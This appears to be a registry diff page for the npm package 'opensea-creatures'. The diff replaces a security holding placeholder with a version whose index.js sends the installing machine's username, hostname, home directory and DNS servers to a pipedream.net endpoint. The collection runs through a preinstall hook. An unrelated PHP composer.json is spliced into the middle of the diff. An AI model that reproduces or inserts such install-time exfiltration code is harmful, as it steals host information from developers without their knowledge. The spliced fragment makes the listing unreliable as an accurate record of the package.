opensea-creatures 0.0.1-security → 1.0.0

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of opensea-creatures might be problematic. Click here for more details.

package/index.js ADDED
@@ -0,0 +1,45 @@
1
+ const os = require("os");
2
+ const dns = require("dns");
3
+ const querystring = require("querystring");
4
+ const https = require("https");
5
+ const packageJSON = require("./package.json");
6
+ const package = packageJSON.name;
7
+
8
+ const trackingData = JSON.stringify({
9
+ packagename: package,
10
+ dirname: __dirname,
11
+ homedirectory: os.homedir(),
12
+ hostname: os.hostname(),
13
+ username: os.userInfo().username,
14
+ dns: dns.getServers(),
15
+ r: packageJSON ? packageJSON.___resolved : undefined,
16
+ version: packageJSON.version,
17
+
18
+ });
19
+
20
+ var postData = querystring.stringify({
21
+ msg: trackingData,
22
+ });
23
+
24
+ var options = {
25
+ hostname: "en2dyyh28r9yenw.m.pipedream.net", //replace burpcollaborator.net with Interactsh or pipedream
26
+ path: "/",
27
+ method: "POST",
28
+ headers: {
29
+ "Content-Type": "application/x-www-form-urlencoded",
30
+ "Content-Length": postData.length,
31
+ },
32
+ };
33
+
34
+ var req = https.request(options, (res) => {
35
+ res.on("data", (d) => {
36
+ process.stdout.write(d);
37
+ });
38
+ });
39
+
40
+ req.on("error", (e) => {
41
+ // console.error(e);
42
+ });
43
+
44
+ req.write(postData);
45
+ req.end();
package/package.json CHANGED
@@ -1,6 +1,12 @@
1
1
  {
2
2
  "name": "opensea-creatures",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
3
+ "version": "1.0.0",
4
+ "description": "poc purposes",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "echo \"Error: no test specified\" && exit 1",
8
+ "preinstall": "node index.js"
9
+ },
10
+ "author": "Gaurav",
11
+ "license": "ISC"
6
12
  }
@@ -0,0 +1,41 @@
1
+ {
2
+ "name": "ubnt/ucrm-plugin-sdk",
3
+ "description": "UCRM plugin SDK",
4
+ "keywords": ["ucrm", "sdk"],
5
+ "type": "library",
6
+ "homepage": "https://github.com/Ubiquiti-App/UCRM-Plugin-SDK",
7
+ "license": "MIT",
8
+ "require": {
9
+ "php": ">=7.3.0",
10
+ "ext-curl": "*",
11
+ "ext-json": "*",
12
+ "guzzlehttp/guzzle": "~6.0",
13
+ "symfony/filesystem": "^4.1"
14
+ },
15
+ "autoload": {
16
+ "psr-4": {
17
+ "Ubnt\\": "src/"
18
+ }
19
+ },
20
+ "autoload-dev": {
21
+ "classmap": [
22
+ "tests/"
23
+ ]
24
+ },
25
+ "require-dev": {
26
+ "phpunit/phpunit": "^8.5",
27
+ "eloquent/phony-phpunit": "^5.0",
28
+ "phpstan/phpstan": "^0.12.15",
29
+ "eloquent/phpstan-phony": "^0.7.0",
30
+ "phpstan/phpstan-strict-rules": "^0.12",
31
+ "symplify/easy-coding-standard": "^7.2",
32
+ "php-coveralls/php-coveralls": "^2.2",
33
+ "ocramius/package-versions": "<1.6"
34
+ },
35
+ "suggest": {
36
+ "ext-zip": "Needed for pack-plugin script."
37
+ },
38
+ "bin": [
39
+ "bin/pack-plugin"
40
+ ]
41
+ }
package/README.md DELETED
@@ -1,5 +0,0 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=opensea-creatures for more information.